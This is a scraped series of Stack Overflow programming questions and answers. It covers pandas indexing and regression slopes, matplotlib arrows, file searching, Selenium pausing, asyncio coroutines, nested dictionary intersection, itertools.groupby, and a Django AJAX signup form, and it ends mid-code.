<p>You need <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.sort_index.html" rel="nofollow"><code>sort_index</code></a> first and then append column <code>ID</code> to <code>index</code>:</p> <pre><code>frame = frame.sort_index() frame.set_index('ID', append=True, inplace=True) print (frame) Events ID 2008-03-30 00:00:00+00:00 168445814 0.0 168445633 0.0 168445653 0.0 245514429 0.0 168445739 0.0 168445810 0.0 332955940 0.0 168445875 0.0 168445628 0.0 217596128 1779.0 177336685 0.0 180799848 0.0 215797757 0.0 180800351 1657.0 183192871 0.0 ... ... </code></pre> <p>If need another ordering of levels use <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.swaplevel.html" rel="nofollow"><code>DataFrame.swaplevel</code></a>:</p> <pre><code>frame = frame.sort_index() frame.set_index('ID', append=True, inplace=True) frame = frame.swaplevel(0,1) print (frame) Events ID 168445814 2008-03-30 00:00:00+00:00 0.0 168445633 2008-03-30 00:00:00+00:00 0.0 168445653 2008-03-30 00:00:00+00:00 0.0 245514429 2008-03-30 00:00:00+00:00 0.0 168445739 2008-03-30 00:00:00+00:00 0.0 168445810 2008-03-30 00:00:00+00:00 0.0 332955940 2008-03-30 00:00:00+00:00 0.0 168445875 2008-03-30 00:00:00+00:00 0.0 168445628 2008-03-30 00:00:00+00:00 0.0 217596128 2008-03-30 00:00:00+00:00 1779.0 177336685 2008-03-30 00:00:00+00:00 0.0 180799848 2008-03-30 00:00:00+00:00 0.0 215797757 2008-03-30 00:00:00+00:00 0.0 180800351 2008-03-30 00:00:00+00:00 1657.0 183192871 2008-03-30 00:00:00+00:00 0.0 186439064 2008-03-30 00:00:00+00:00 0.0 199856024 2008-03-30 00:00:00+00:00 0.0 ... ... 
</code></pre> <p>If need copy column to <code>index</code> use <code>set_index(frame.ID, ...</code>:</p> <pre><code>frame = frame.sort_index() frame.set_index(frame.ID, append=True, inplace=True) frame = frame.swaplevel(0,1) print (frame) Events ID ID 168445814 2008-03-30 00:00:00+00:00 0.0 168445814 168445633 2008-03-30 00:00:00+00:00 0.0 168445633 168445653 2008-03-30 00:00:00+00:00 0.0 168445653 245514429 2008-03-30 00:00:00+00:00 0.0 245514429 168445739 2008-03-30 00:00:00+00:00 0.0 168445739 168445810 2008-03-30 00:00:00+00:00 0.0 168445810 332955940 2008-03-30 00:00:00+00:00 0.0 332955940 168445875 2008-03-30 00:00:00+00:00 0.0 168445875 168445628 2008-03-30 00:00:00+00:00 0.0 168445628 217596128 2008-03-30 00:00:00+00:00 1779.0 217596128 177336685 2008-03-30 00:00:00+00:00 0.0 177336685 180799848 2008-03-30 00:00:00+00:00 0.0 180799848 215797757 2008-03-30 00:00:00+00:00 0.0 215797757 180800351 2008-03-30 00:00:00+00:00 1657.0 180800351 183192871 2008-03-30 00:00:00+00:00 0.0 183192871 186439064 2008-03-30 00:00:00+00:00 0.0 186439064 ... ... </code></pre>
1
2016-07-21T11:19:42Z
[ "python", "datetime", "pandas", "dataframe" ]
Alter the width of an annotate arrow in matplotlib
38,502,594
<p>I am plotting an arrow in <code>matplotlib</code> using <code>annotate</code>. I would like to make the arrow fatter. The effect I am after is a two-headed arrow with a thin edge line where I can control the arrow width i.e. not changing <code>linewidth</code>. I have tried <code>kwargs</code> such as <code>width</code> after <a href="http://stackoverflow.com/questions/15577941/how-to-make-arrow-thinner-matplotlib">this</a> answer but this caused an error, I have also tried different variations of <code>arrowstyle</code> and <code>connectorstyle</code> again without luck. I'm sure it's a simple one!</p> <p>My code so far is:</p> <pre><code>import matplotlib.pyplot as plt plt.figure(figsize=(5, 5)) plt.annotate('', xy=(.2, .2), xycoords='data', xytext=(.8, .8), textcoords='data', arrowprops=dict(arrowstyle='&lt;|-|&gt;', facecolor='w', edgecolor='k', lw=1)) plt.show() </code></pre> <p>I am using Python 2.7 and Matplotlib 1.5.1</p>
0
2016-07-21T11:06:31Z
38,517,497
<p>The easiest way to do this will be by using <a href="http://matplotlib.org/api/patches_api.html#matplotlib.patches.FancyBboxPatch" rel="nofollow"><code>FancyBboxPatch</code></a> with the darrow (double arrow) option. The one tricky part of this method is that the arrow will not rotate around its tip but rather the edge of the rectangle defining the body of the arrow. I demonstrate that with a red dot placed at the rotation location.</p> <pre><code>import matplotlib.pyplot as plt import matplotlib.patches as patches import matplotlib as mpl fig = plt.figure() ax = fig.add_subplot(111) #Variables of the arrow x0 = 20 y0 = 20 width = 20 height = 2 rotation = 45 facecol = 'cyan' edgecol = 'black' linewidth=5 # create arrow arr = patches.FancyBboxPatch((x0,y0),width,height,boxstyle='darrow', lw=linewidth,ec=edgecol,fc=facecol) #Rotate the arrow. Note that it does not rotate about the tip t2 = mpl.transforms.Affine2D().rotate_deg_around(x0,y0,rotation) + ax.transData plt.plot(x0,y0,'ro') # We rotate around this point arr.set_transform(t2) # Rotate the arrow ax.add_patch(arr) plt.xlim(10, 60) plt.ylim(10, 60) plt.grid(True) plt.show() </code></pre> <p>Giving:</p> <p><a href="http://i.stack.imgur.com/lICHn.png" rel="nofollow"><img src="http://i.stack.imgur.com/lICHn.png" alt="enter image description here"></a></p>
0
2016-07-22T03:06:01Z
[ "python", "python-2.7", "matplotlib" ]
python printing the path names of .c files from a directory tree
38,502,657
<p>I'm a beginner in Python. I am trying to work with a directory tree that contains test cases (.c files) at variable depth; say, test (top directory) has 2 children test1 and test2. test1 has further branches t1 and t2 which contain t1.c and t2.c respectively. Similarly, test2 has 2 children test21 and test22. test21 has t3 and t4 which contain t3.c and t4.c respectively. test22 has t5 and t6 which have t5.c and t6.c. I am trying to search for the .c file and then print its path using recursion.</p> <p>The error that I am getting is that the code traverses through only one branch and does not go back to the previous level to go through the other branches. Please help me here.</p> <p>Following is my code:</p> <pre><code># assume, at no level folders and .c files are present at the same time import os import fnmatch # move to test directory os.chdir('/home/gyadav/test') # function to create a list of sub directories def create_subdir_list(): subdirs = os.listdir('.') len_subdirs = len(subdirs) - 1 # while i != length for i in range(0, len_subdirs): # move to next folder os.chdir(subdirs[i]) print os.getcwd() subdirs1 = (os.listdir('.')) print subdirs1 # call function - open thedirectory and check for .c file open_dir('.') # definition of check for . c file def check_for_c(): cfile = fnmatch.filter(os.listdir('.'), '*.c') # if file found if len(cfile) != 0: # save the path path = os.path.dirname(os.path.abspath(cfile[0])) print path os.chdir('..') print os.getcwd() else: create_subdir_list() def open_dir(name): check_for_c() open_dir('.') </code></pre>
1
2016-07-21T11:09:18Z
38,502,879
<p>It's good to use your own way to practice Python, but an efficient way would be:</p> <pre><code>&gt;&gt;&gt; PATH = '/home/sijan/Desktop/' &gt;&gt;&gt; import os &gt;&gt;&gt; from glob import glob &gt;&gt;&gt; result = [y for x in os.walk(PATH) for y in glob(os.path.join(x[0], '*.c'))] </code></pre> <p>It will list all the .c files in the folders within the given path.</p>
1
2016-07-21T11:19:54Z
[ "python", "recursion", "tree", "directory" ]
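For the directory-tree question above, the recursion can be delegated entirely to `os.walk`, which visits every branch, so no manual `chdir` bookkeeping is needed. A sketch:

```python
import os

def find_c_files(root):
    """Return the paths of all .c files anywhere under root."""
    matches = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            if name.endswith('.c'):
                matches.append(os.path.join(dirpath, name))
    return sorted(matches)
```

Calling `find_c_files('/home/gyadav/test')` would print-ready paths for every branch (t1.c, t2.c, t3.c, ...), regardless of depth.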
pause and resume Selenium execution
38,502,842
<p>I am looking for an option to pause and resume Selenium execution.</p> <ol> <li>start the selenium execution</li> </ol> <p><strong>2. pause at a certain step explicitly by some means (commandline/in-line code/manually)</strong></p> <ol start="3"> <li>continue execution</li> </ol> <p>I know that we can keep</p> <pre><code>Thread.sleep() </code></pre> <p>or</p> <pre><code>time.sleep </code></pre> <p>I want to give the pause dynamically in between the execution of a test case.</p> <p>Programming language can be Java or Python.</p> <p>is there a way in java or python to pass a pause to the execution dynamically?(probably that can help)</p> <p>Any thoughts and solutions are greatly appreciated.</p>
0
2016-07-21T11:18:05Z
38,503,006
<p>Use an IDE, set breakpoints, and debug your script.</p>
0
2016-07-21T11:25:38Z
[ "java", "python", "selenium" ]
pause and resume Selenium execution
38,502,842
<p>I am looking for an option to pause and resume Selenium execution.</p> <ol> <li>start the selenium execution</li> </ol> <p><strong>2. pause at a certain step explicitly by some means (commandline/in-line code/manually)</strong></p> <ol start="3"> <li>continue execution</li> </ol> <p>I know that we can keep</p> <pre><code>Thread.sleep() </code></pre> <p>or</p> <pre><code>time.sleep </code></pre> <p>I want to give the pause dynamically in between the execution of a test case.</p> <p>Programming language can be Java or Python.</p> <p>is there a way in java or python to pass a pause to the execution dynamically?(probably that can help)</p> <p>Any thoughts and solutions are greatly appreciated.</p>
0
2016-07-21T11:18:05Z
38,503,856
<p>For Python, use can use <code>pdb</code> for debugging. Just drop the following line at the step where you want to pause and it will drop you into the debugger. You might have to get a little familiar with <a href="https://docs.python.org/2/library/pdb.html" rel="nofollow">pdb</a> </p> <pre><code>import pdb; pdb.set_trace() </code></pre>
0
2016-07-21T12:06:45Z
[ "java", "python", "selenium" ]
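Besides breakpoints, one way to get a pause that can be triggered manually while the script runs is a sentinel file: the test checks for the file between steps and blocks while it exists, so creating or deleting the file from the command line pauses and resumes execution. A hypothetical sketch; the file path and helper name are illustrative, not part of Selenium:

```python
import os
import time

PAUSE_FILE = '/tmp/pause_selenium'  # create this file to pause, delete it to resume

def wait_if_paused(pause_file=PAUSE_FILE, poll_seconds=0.5):
    """Block while the sentinel file exists; return immediately otherwise."""
    while os.path.exists(pause_file):
        time.sleep(poll_seconds)

# Call wait_if_paused() between Selenium steps, e.g.:
#   driver.get(url)
#   wait_if_paused()
#   driver.find_element_by_id('next').click()
```

`touch /tmp/pause_selenium` from a shell then pauses the run at the next checkpoint; `rm /tmp/pause_selenium` resumes it.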
Asyncio coroutines
38,502,885
<p>I thought I had grokked coroutines with David Beazley's very good <a href="http://www.dabeaz.com/coroutines/" rel="nofollow">presentation</a> but I can't reconcile it fully with the new syntax described in <a href="https://www.python.org/dev/peps/pep-0492/" rel="nofollow">PEP-492</a>. </p> <p>In the presentation, he explains how coroutines can be thought of as a pipeline that gets pushed to as opposed to pulled from like in generators. </p> <p>For example:</p> <pre><code># cofollow.py # # A simple example showing how to hook up a pipeline with # coroutines. To run this, you will need a log file. # Run the program logsim.py in the background to get a data # source. from coroutine import coroutine # A data source. This is not a coroutine, but it sends # data into one (target) import time def follow(thefile, target): thefile.seek(0,2) # Go to the end of the file while True: line = thefile.readline() if not line: time.sleep(0.1) # Sleep briefly continue target.send(line) # A sink. A coroutine that receives data @coroutine def printer(): while True: line = (yield) print line, # Example use if __name__ == '__main__': f = open("access-log") follow(f,printer()) </code></pre> <p>How can one implement the <code>printer()</code> coroutine using this new syntax? I have not yet seen an example where the coroutine gets pushed to using this new syntax. Is it possible?</p>
1
2016-07-21T11:20:10Z
38,503,429
<p>What you have there is not a coroutine in the sense of the <code>asyncio</code> module and/or PEP-492. As the PEP itself says:</p> <blockquote> <p>[This PEP] is relevant only to the kind of coroutine that uses <code>yield</code> as a signal to the scheduler, indicating that the coroutine will be waiting until an event (such as IO) is completed.</p> </blockquote> <ol> <li>There's no scheduler (event loop) involved in your example, and</li> <li>the coroutine is not using <code>yield</code> only "as a signal to the scheduler"; it is really using it to read data.</li> </ol>
1
2016-07-21T11:46:36Z
[ "python", "python-3.x", "coroutine", "python-asyncio" ]
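For the push-style pattern the question above asks about: a native `async def` coroutine cannot receive values the way `line = (yield)` does, so one common translation (an assumption about intent, not the only way) is to push items through an `asyncio.Queue` that the coroutine awaits on. A sketch, shown with `asyncio.run` for brevity (Python 3.7+; on 3.5 use `loop.run_until_complete`):

```python
import asyncio

async def consumer(queue, sink):
    """Await items pushed into the queue until a None sentinel arrives."""
    while True:
        item = await queue.get()
        if item is None:
            break
        sink.append(item)

async def main():
    queue = asyncio.Queue()
    sink = []
    task = asyncio.ensure_future(consumer(queue, sink))
    for line in ['line 1\n', 'line 2\n']:
        await queue.put(line)   # the "push", replacing target.send(line)
    await queue.put(None)       # signal end of stream
    await task
    return sink

received = asyncio.run(main())
```

The producer side (the `follow()` file tailer) would then `await queue.put(line)` instead of calling `.send(line)`.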
Python Re-ordering the lines in a dat file by string
38,502,906
<p>Sorry if this is a repeat but I can't find it for now. </p> <p>Basically I am opening and reading a <code>dat</code> file which contains a load of paths that I need to loop through to get certain information. </p> <p>Each of the lines in the <code>base.dat</code> file contains <code>m.somenumber</code>. For example some lines in the file might be:</p> <pre><code>Volumes/hard_disc/u14_cut//u14m12.40_all.beta/beta8 Volumes/hard_disc/u14_cut/u14m12.50_all.beta/beta8 Volumes/hard_disc/u14_cut/u14m11.40_all.beta/beta8 </code></pre> <p>I need to be able to re-write the dat file so that all the lines are re-ordered from the <strong>largest m.number to the smallest m.number</strong>. Then when I loop through PATH in database (shown in code) I am looping through in decreasing m.</p> <p>Here is the relevant part of the code</p> <pre><code>base = open('base8.dat', 'r') database= base.read().splitlines() base.close() counter=0 mu_list=np.array([]) delta_list=np.array([]) ofsset = 0.00136 beta=0 for PATH in database: if os.path.exists(str(PATH)+'/CHI/optimal_spectral_function_CHI.dat'): n1_array = numpy.loadtxt(str(PATH)+'/AVERAGES/av-err.n.dat') n7_array= numpy.loadtxt(str(PATH)+'/AVERAGES/av-err.npx.dat') n1_mean = n1_array[0] delta=round(float(5.0+ofsset-(n1_array[0]*2.+4.*n7_array[0])),6) par = open(str(PATH)+"/params10", "r") for line in par: counter= counter+1 if re.match("mu", line): mioMU= re.findall('\d+', line.translate(None, ';')) mioMU2=line.split()[2][:-1] mu=mioMU2 print mu, delta, PATH mu_list=np.append(mu_list, mu) delta_list=np.append(delta_list,delta) optimal_counter=0 print delta_list, mu_list </code></pre> <p>I have checked the possible flagged repeat but I can't seem to get it to work for mine because my file doesn't technically contain strings and numbers. 
The 'number' I need to sort by is contained in the string as a whole:</p> <pre><code>Volumes/data_disc/u14_cut/from_met/u14m11.40_all.beta/beta16 </code></pre> <p>and I need to sort the entire line by just the m(somenumber) part</p>
0
2016-07-21T11:20:56Z
38,503,870
<p>Assuming that the number part of your line has the form of a float you can use a regular expression to match that part and convert it from string to float.</p> <p>After that you can use this information in order to sort all the lines read from your file. I added a invalid line in order to show how invalid data is handled.</p> <p>As a quick example I would suggest something like this:</p> <pre><code>import re # TODO: Read file and get list of lines l = ['Volumes/hard_disc/u14_cut/u14**m12.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.50**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**mm11.40**_all.beta/beta8'] regex = r'^.+\*{2}m{1}(?P&lt;criterion&gt;[0-9\.]*)\*{2}.+$' p = re.compile(regex) criterion_list = [] for s in l: m = p.match(s) if m: crit = m.group('criterion') try: crit = float(crit) except Exception as e: crit = 0 else: crit = 0 criterion_list.append(crit) tuples_list = list(zip(criterion_list, l)) output = [element[1] for element in sorted(tuples_list, key=lambda t: t[0])] print(output) # TODO: Write output to new file or overwrite existing one. </code></pre> <p>Giving:</p> <pre><code>['Volumes/hard_disc/u14_cut/u14**mm11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m11.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.40**_all.beta/beta8', 'Volumes/hard_disc/u14_cut/u14**m12.50**_all.beta/beta8'] </code></pre> <p>This snippets starts after all lines are read from the file and stored into a list (list called <code>l</code> here). The regex group <code>criterion</code> catches the float part contained in <code>**m12.50**</code> as you can see on <a href="https://regex101.com/r/eW7nG1/1" rel="nofollow">regex101</a>. So iterating through all the lines gives you a new list containing all matching groups as floats. 
If the regex does not match on a given string or casting the group to a float fails, <code>crit</code> is set to zero in order to have those invalid lines at the very beginning of the sorted list later.</p> <p>After that <code>zip()</code> is used to get a list of tuples containing the extracted floats and the corresponding strings. Now you can sort this list of tuples based on each tuple's first element and write the corresponding string to a new list <code>output</code>.</p>
0
2016-07-21T12:07:33Z
[ "python", "file", "order", "file.readalllines" ]
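Applied to the question's own path format (no `**` markers), the sort key can be extracted with a single regex and passed to `sorted` with `reverse=True` for largest-m-first order. A sketch, assuming the number of interest always directly follows the letter `m` in the path:

```python
import re

def m_value(line):
    """Extract the float after 'm' in paths like '.../u14m12.40_all.beta/beta8'."""
    match = re.search(r'm(\d+(?:\.\d+)?)', line)
    return float(match.group(1)) if match else float('-inf')

lines = [
    'Volumes/hard_disc/u14_cut/u14m12.40_all.beta/beta8',
    'Volumes/hard_disc/u14_cut/u14m12.50_all.beta/beta8',
    'Volumes/hard_disc/u14_cut/u14m11.40_all.beta/beta8',
]
ordered = sorted(lines, key=m_value, reverse=True)  # largest m first
```

Lines without a recoverable number sort to the end; writing `ordered` back out with `'\n'.join(ordered)` reproduces the dat file in decreasing-m order.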
calculate linear regression slope matrix (analogous to correlation matrix) - Python/Pandas
38,502,916
<p>Pandas has a really nice function that gives you a correlation matrix Data Frame for your data DataFrame, <a href="http://pandas.pydata.org/pandas-docs/stable/generated/pandas.DataFrame.corr.html" rel="nofollow">pd.DataFrame.corr()</a>.</p> <p>The r of a correlation, however, isn't always that informative. Depending on your application the slope of the linear regression might be just as important. Is there any function that can return that for an input matrix or dataframe?</p> <p>Other than iterating with <a href="http://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.stats.linregress.html" rel="nofollow">scipy.stats.linregress()</a>, which would be a pain, I don't see any way to do this?</p>
0
2016-07-21T11:21:33Z
38,504,303
<p>Slope of a regression line y=b<sub>0</sub> + b<sub>1</sub> * x can also be calculated using the correlation coefficient: b<sub>1</sub> = corr(x, y) * σ<sub>y</sub> / σ<sub>x</sub></p> <p>Using numpy's newaxis to create the σ<sub>y</sub> / σ<sub>x</sub> matrix:</p> <pre><code>df.corr() * (df.std().values / df.std().values[:, np.newaxis]) Out[59]: A B C A 1.000000 -0.686981 0.252078 B -0.473282 1.000000 -0.263359 C 0.137670 -0.208775 1.000000 </code></pre> <p>where <code>df</code> is:</p> <pre><code>df Out[60]: A B C 0 5 6 9 1 4 4 2 2 7 3 5 3 4 3 9 4 6 5 3 5 3 8 6 6 2 8 1 7 7 2 7 8 4 1 5 9 1 6 6 </code></pre> <p>And this is for verification:</p> <pre><code>res = [] for col1, col2 in itertools.product(df.columns, repeat=2): res.append(linregress(df[col1], df[col2]).slope) np.array(res).reshape(3, 3) Out[72]: array([[ 1. , -0.68698061, 0.25207756], [-0.47328244, 1. , -0.26335878], [ 0.1376702 , -0.20877458, 1. ]]) </code></pre>
2
2016-07-21T12:27:40Z
[ "python", "pandas", "linear-regression", "correlation" ]
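The identity behind the vectorised expression, namely that the slope of regressing y on x equals both cov(x, y)/var(x) and r times the ratio of standard deviations (sigma of y over sigma of x), can be checked numerically with the standard library alone:

```python
import statistics as st

x = [1, 2, 3, 4, 5]
y = [2, 4, 5, 4, 5]
n = len(x)
mx, my = st.mean(x), st.mean(y)

cov_xy = sum((a - mx) * (b - my) for a, b in zip(x, y)) / (n - 1)
sx, sy = st.stdev(x), st.stdev(y)
r = cov_xy / (sx * sy)

slope_direct = cov_xy / st.variance(x)  # cov(x, y) / var(x)
slope_via_r = r * sy / sx               # r * sigma_y / sigma_x
```

Both give 0.6 for this data; note the ratio is sigma_y over sigma_x, not the other way round.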
python pandas assigning to existing dataframe in iteration
38,503,056
<p>I have a long list of files that I want to load into separate data frames. However pandas does not seem to support this directly, so I am struggling to do it. In my example below, file_map would actually be imported so I can't have a static mapping between variable and file_name. The example does not achieve what I am looking for because in the loop, Python creates a new variable df. Is there somehow a way to actually point at the old variable from the dictionary and set this to whatever pd.read_csv returns?</p> <pre><code>columns = ['c1', 'c2', 'c3'] df_d1 = pd.DataFrame() df_d2 = pd.DataFrame() file_map = { 'data_1.csv': df_d1, 'data_2.csv': df_d2, } for file_name , df in file_map.items(): df = pd.read_csv(path + file_name, header=None, sep=";", names=columns, parse_dates = {'dateTime': ['c1']}, ) </code></pre> <p>Alternatively, are there better ways to generally handle this than what I am doing here? Suggestions are welcome.</p>
0
2016-07-21T11:28:10Z
38,503,314
<p>Here's an approach that works well in practice:</p> <pre><code>from glob import glob import os dataframes = {} for fn in glob('/path/to/files/&lt;pattern&gt;.csv'): df = pd.read_csv(fn, ...) dataframes[os.path.basename(fn)] = df </code></pre> <p>Here <code>dataframes</code> is a dictionary of dataframes. I'm using <code>glob</code> to get the actual file list, but of course this list can come from anywhere. <code>os.path.basename</code> returns just the filename, without the <code>/path/to/files</code> part.</p> <p>Alternatively, if you want all the data in the same dataframe you can also do:</p> <pre><code>data = None for fn in glob('/path/to/files/&lt;pattern&gt;.csv'): df = pd.read_csv(fn, ...) df['source'] = os.path.basename(fn) data = pd.concat([data, df]) if data is not None else df </code></pre> <p>Here <code>data</code> at the end of the loop is a dataframe with all data. Of course this assumes the files are of the same content type, i.e. you actually want one dataframe.</p>
1
2016-07-21T11:40:39Z
[ "python", "pandas" ]
Get intersection elements of nested dictionaries in Python
38,503,084
<p>Let's say I have a list of dicts. For example, the list contains the following dicts:</p> <pre><code>{'david': {'status': 'available', 'type': 'human', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} {'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'status': 'available', 'type': 'robot'}} </code></pre> <p>(The nesting level is not fixed)</p> <p>As a result, I want to have:</p> <pre><code>{'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} </code></pre> <p>That is, I want a dict which contains the common elements that exist in both dicts, not only the common keys.</p> <p><br> Thanks for any help.</p>
0
2016-07-21T11:29:55Z
38,504,949
<p>I don't quite understand what you mean by 'intersection'. If you want to get the common attributes of each dictionary item, you can use a <code>set</code> to get all the common keys with the following code:</p> <pre><code>common_keys = reduce(set.intersection, [set(i.keys()) for i in d.values()]) </code></pre> <p>Then you can iterate over the dictionary to filter the common keys and values.</p>
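A minimal sketch of this approach, shown here on the two inner 'david' dicts from the question (top level only) and keeping a key only when both dicts also agree on its value:

```python
from functools import reduce  # reduce is a builtin in Python 2, in functools in Python 3

d1 = {'status': 'available', 'type': 'human', 'location': [2, 3, 4]}
d2 = {'status': 'available', 'location': [2, 3, 4]}

# Intersect the key sets of all dictionaries under comparison ...
common_keys = reduce(set.intersection, [set(d) for d in (d1, d2)])

# ... then keep only the keys whose values also agree.
common = {k: d1[k] for k in common_keys if d1[k] == d2[k]}
```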
0
2016-07-21T12:58:46Z
[ "python", "dictionary", "nested" ]
Get intersection elements of nested dictionaries in Python
38,503,084
<p>Let's say I have a list of dicts. For example, the list contains the following dicts:</p> <pre><code>{'david': {'status': 'available', 'type': 'human', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} {'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'status': 'available', 'type': 'robot'}} </code></pre> <p>(The nesting level is not fixed)</p> <p>As a result, I want to have:</p> <pre><code>{'david': {'status': 'available', 'location': [2, 3, 4]}, 'kuka': {'type': 'robot'}} </code></pre> <p>That is, I want a dict which contains the common elements that exist in both dicts, not only the common keys.</p> <p><br> Thanks for any help.</p>
0
2016-07-21T11:29:55Z
38,506,628
<p>You can recursively iterate over all dictionary keys. The most compact way of writing this is probably</p> <pre><code>def common_items(d1, d2): return {k: common_items(d1[k], d2[k]) if isinstance(d1[k], dict) else d1[k] for k in d1.viewkeys() &amp; d2.viewkeys()} </code></pre> <p>I'd recommend spelling the dictionary comprehension out into a for loop to make the code more readable, and to allow raising an error in case there are differing values:</p> <pre><code>def common_items(d1, d2): result = {} for k in d1.viewkeys() &amp; d2.viewkeys(): v1 = d1[k] v2 = d2[k] if isinstance(v1, dict) and isinstance(v2, dict): result[k] = common_items(v1, v2) elif v1 == v2: result[k] = v1 else: raise ValueError("values for common keys don't match") return result </code></pre>
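For reference, `viewkeys()` is Python 2 only; in Python 3, `dict.keys()` already supports set operations. A Python 3 sketch of the same recursion, written to silently drop mismatched non-dict values (matching the output the question asks for) instead of raising:

```python
def common_items(d1, d2):
    # Python 3: dict.keys() supports set operations directly, so
    # d1.keys() & d2.keys() replaces the Python 2 viewkeys() call.
    result = {}
    for k in d1.keys() & d2.keys():
        v1, v2 = d1[k], d2[k]
        if isinstance(v1, dict) and isinstance(v2, dict):
            result[k] = common_items(v1, v2)
        elif v1 == v2:
            result[k] = v1
        # differing non-dict values are silently dropped here
    return result

a = {'david': {'status': 'available', 'type': 'human', 'location': [2, 3, 4]},
     'kuka': {'type': 'robot'}}
b = {'david': {'status': 'available', 'location': [2, 3, 4]},
     'kuka': {'status': 'available', 'type': 'robot'}}

merged = common_items(a, b)
```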
0
2016-07-21T14:13:10Z
[ "python", "dictionary", "nested" ]
Using groupby() together with filter in list comprehensions
38,503,159
<p>Why is it that</p> <pre><code>&gt;&gt;&gt; [ ( { k: len(list(g)) } ) for k, g in groupby(sorted('ABABAABBAC')) ] [{'A': 5}, {'B': 4}, {'C': 1}] </code></pre> <p>but</p> <pre><code>&gt;&gt;&gt; [ ( { k: len(list(g)) } ) for k, g in groupby(sorted('ABABAABBAC')) if len(list(g)) &gt; 1 ] [{'A': 0}, {'B': 0}] </code></pre> <p>It correctly filters out <code>C</code> but why are the values <code>0</code>s instead of <code>4</code> and <code>5</code>? It makes no sense.</p> <p>(It's trivial to find a working solution, but I want to understand what's going on here).</p>
2
2016-07-21T11:33:24Z
38,503,255
<p>You have consumed the iterator when you called <code>len(list(g))</code> in your <em>if statement</em> so your <code>len(list(g))</code> returns 0 as there is nothing left to iterate over. </p> <pre><code>In [1]: it = iter([1,2,3]) In [2]: list(it) # call list once consumes Out[2]: [1, 2, 3] In [3]: list(it) # nothing left on second call Out[3]: [] </code></pre> <p>So <code>len([])</code> as you would expect returns 0</p>
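One way to keep the filtering comprehension from consuming each group twice is to materialize every group's length exactly once, then filter on that plain number (a sketch):

```python
from itertools import groupby

data = sorted('ABABAABBAC')

# Compute each group's length once; the group iterator is consumed only here.
counts = [(k, len(list(g))) for k, g in groupby(data)]

# Now the filter works on plain integers, not on exhausted iterators.
result = [{k: n} for k, n in counts if n > 1]
```

This reproduces the expected [{'A': 5}, {'B': 4}].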
3
2016-07-21T11:37:50Z
[ "python", "grouping", "list-comprehension" ]
Django user signup / registration form not working
38,503,189
<p>I made a sign up form following a tutorial.</p> <p>what im trying to do as you can see here is to have the data transferred and get an error or success message to the targeted div in response without refreshing the page.</p> <p>i have set the 3 forms : email ,email2 and password in the index.html</p> <p>but the site is not doing anything, and apparantly it doesn't work.</p> <p>I am also getting the </p> <p>TypeError: is not JSON serializable</p> <p>error.</p> <p>I think im doing something wrong here.</p> <p>can you explain to me what im doing is wrong?</p> <p>thanks.</p> <p>index.html</p> <pre><code> &lt;script&gt; // using jQuery function getCookie(name) { var cookieValue = null; if (document.cookie &amp;&amp; document.cookie !== '') { var cookies = document.cookie.split(';'); for (var i = 0; i &lt; cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); // Does this cookie string begin with the name we want? if (cookie.substring(0, name.length + 1) === (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } var csrftoken = getCookie('csrftoken'); function csrfSafeMethod(method) { // these HTTP methods do not require CSRF protection return (/^(GET|HEAD|OPTIONS|TRACE)$/.test(method)); } $.ajaxSetup({ beforeSend: function(xhr, settings) { if (!csrfSafeMethod(settings.type) &amp;&amp; !this.crossDomain) { xhr.setRequestHeader("X-CSRFToken", csrftoken); } } }); &lt;/script&gt; &lt;div class="signup_div"&gt; &lt;form id="signup_form" method="post" action=""&gt; {% csrf_token %} &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Email Address &lt;/label&gt;--&gt; &lt;input required="" type="text" name="email" placeholder="Email address"&gt; &lt;/div&gt; &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Email Address &lt;/label&gt;--&gt; &lt;input required="" type="text" name="email2" placeholder="Email address"&gt; &lt;/div&gt; &lt;div class="field-wrap"&gt; &lt;!--&lt;label&gt; Password 
&lt;/label&gt;--&gt; &lt;input required="" type="password" name="password" placeholder="Password"&gt; &lt;/div&gt; &lt;button class="ladda-button forgot" data-color="mint" data-style="slide-up"&gt;&lt;a href=""&gt;&lt;span class="ladda-label"&gt;Forgot Password?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;/button&gt; &lt;button class="ladda-button button-primary login_button" data-style="slide-up"/&gt;&lt;span class="ladda-label"&gt;Sign Up&lt;/span&gt;&lt;/button&gt; &lt;/form&gt; &lt;/div&gt; &lt;script&gt; $('#signup_form').on('submit', function(e) { e.preventDefault() formdata = $('#signup_form').serialize(); formdata.csrfmiddlewaretoken = '{{ csrf_token }}'; $.ajax({ type:"POST", data: formdata, url: '{% url 'signup' %}', error: function(response){ $('.login_div').text(response.error) }, success: function(response){ &lt;!--console.log(response);--&gt; $('.signup_div').text(response.success) $('.signup_div').text(response.error) // do something with response } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; </code></pre> <p>views.py</p> <pre><code> def ajax_signup(request): form = UserSignupForm(request.POST or None) if form.is_valid(): user = form.save(commit=False) password = form.cleaned_data.get('password') user.set_password(password) user.save() new_user = authenticate(username=user.username, password=password) login(request, new_user) data = {'form': form, 'success': 'success'} else: data = {'form': form, 'error': 'error'} return HttpResponse(json.dumps(data), content_type='application/json') </code></pre> <p>and forms.py</p> <pre><code> from django import forms from django.contrib.auth.models import User from django.contrib.auth import authenticate, get_user_model, login, logout class UserSignupForm(forms.ModelForm): email = forms.EmailField(label='Confirm Email') email2 = forms.EmailField(label='Confirm Email') password = forms.CharField(widget=forms.PasswordInput) class Meta: model = User fields = [ 'username', 'email2', 'email', 'password' ] def 
